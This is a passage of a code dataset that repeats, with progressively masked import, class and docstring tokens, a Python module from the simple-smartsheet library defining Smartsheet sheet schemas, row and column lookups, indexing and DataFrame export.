attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
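`as_list` and `as_dataframe` export the sheet contents; `as_dataframe` imports pandas lazily, which the docstring says can be installed via the `simple-smartsheet[pandas]` extra. A short sketch, assuming a loaded `sheet` instance:

# Sketch only: `sheet` is assumed to be a loaded Sheet instance.
records = sheet.as_list()        # list of {column title: cell value} dicts,
for rec in records[:3]:          # one dict per row via row.as_dict()
    print(rec)

# Requires pandas ("pip install simple-smartsheet[pandas]" per the docstring).
df = sheet.as_dataframe()        # DataFrame built from row.as_series() per row
print(df.head())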
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = 
attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
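`_update_column_lookup` in the record above only logs at INFO level when two columns share a title and then lets the last column win, so title-based lookups are dependable only when column titles are unique. A hypothetical caller-side check (not part of the library) that one might run before relying on title lookups:

from collections import Counter

def duplicate_column_titles(sheet) -> list:
    """Hypothetical helper: return column titles appearing more than once,
    since _column_title_to_column keeps only the last column per title."""
    counts = Counter(c.title for c in sheet.columns if c.title is not None)
    return [title for title, n in counts.items() if n > 1]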
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def 
__attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SheetSchema(CoreSchema):\n <docstring token>\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n 
self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary 